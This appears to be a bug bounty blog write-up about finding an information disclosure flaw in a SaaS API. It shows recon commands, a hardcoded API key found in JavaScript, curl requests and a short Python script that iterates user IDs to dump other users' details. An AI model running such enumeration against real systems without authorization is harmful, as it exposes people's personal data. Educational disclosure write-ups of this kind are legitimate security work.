.png)
2 days ago
13 BOOK THIS SPACE FOR AD
ARTICLE AD
Bug bounty hunting is a rollercoaster of emotions. Some days, you’re on top of the world, discovering critical vulnerabilities, and other days, you’re drowning in false positives and duplicate reports. Today was one of those golden days when patience and persistence paid off. I stumbled upon an information disclosure vulnerability that could have easily been awarded an $800+ bounty.
Here’s my full journey — from frustration to victory — detailing my recon techniques, code examples, and proof of exploitation.
I started with my usual methodology:
Target Selection: I was testing a private bug bounty program on HackerOne, focusing on an enterprise-level SaaS product.
Subdomain Enumeration: I used subfinder, amass, and crt.sh to gather subdomains.
Directory Bruteforcing: I ran ffuf to uncover hidden directories and endpoints.
JS File Analysis: I extracted and analyzed JavaScript files using linkfinder and gf patterns.
Command Used:
subfinder -d target.com | tee subs.txtamass enum -passive -d target.com -o amass_subs.txt
cat subs.txt amass_subs.txt | sort -u > all_subs.txt
After merging and cleaning up the subdomains, I checked for sensitive files like robots.txt, .env, and .git. Nothing juicy. Then, I moved on to analyzing JavaScript files for endpoints.
While analyzing JS files, I came across an internal API endpoint hardcoded in main.js:
const API_KEY = "AIzaSyD-EXAMPLE-KEY";fetch("https://api.target.com/v1/user/details", {
method: "GET",
headers: {
"Authorization": `Bearer ${API_KEY}`
}
}).then(response => response.json())
.then(data => console.log(data));
Immediately, my hacker instincts kicked in.
Step 1: Check if the API key was valid.Step 2: Test if it had access to sensitive user data.Step 3: Try unauthorized access by modifying API parameters.I used cURL to test the API:
curl -H "Authorization: Bearer AIzaSyD-EXAMPLE-KEY" "https://api.target.com/v1/user/details"Boom! It returned full user details, including email addresses, usernames, and even hashed passwords! This was a major security flaw, as an attacker could easily enumerate users.
I wanted to see if I could escalate this bug. I played around with the API by changing the user_id parameter:
curl -H "Authorization: Bearer AIzaSyD-EXAMPLE-KEY" "https://api.target.com/v1/user/details?user_id=123"To my surprise, it worked! I was able to access details of other users just by iterating user_id. The lack of proper authentication checks made this a severe information disclosure vulnerability.
To make this more efficient, I wrote a Python script to extract user data:
import requestsapi_key = "AIzaSyD-EXAMPLE-KEY"url = "https://api.target.com/v1/user/details?user_id={}"for user_id in range(1, 100):
headers = {"Authorization": f"Bearer {api_key}"}
response = requests.get(url.format(user_id), headers=headers)
if response.status_code == 200:
print(response.json())
This script iterated over user IDs and dumped sensitive user information, proving the severity of the issue.
I immediately reported the issue to the bug bounty platform, providing:
Steps to ReproduceImpact AnalysisPoC ScriptSuggested Fixes (e.g., implementing OAuth properly, rate limiting, and checking user permissions)Within 24 hours, the security team acknowledged the bug and classified it as High Severity. A few days later, I received an $800 bounty — not bad for a few hours of work!
Always Analyze JavaScript Files — API keys, endpoints, and tokens are often leaked here.
Test API Authentication Properly — Try unauthorized access with modified parameters.
Automate Recon & Testing — Use Python scripts to scale vulnerability testing.
Report Responsibly — Provide clear PoCs and mitigation steps for faster bounty payouts.
Bug bounty hunting is all about persistence. Some days are frustrating, but one lucky find can make it all worthwhile.
🔴 YouTube: youtube.com/@theindiannetwork
📝 Medium Blog: theindiannetworks.blogspot.com
📧 Email: theindiannetwork@protonmail.com
If you found this article helpful, make sure to subscribe to my YouTube channel & Follow Me on Medium for more cybersecurity content!
Bengali (Bangladesh) · 
English (United States) ·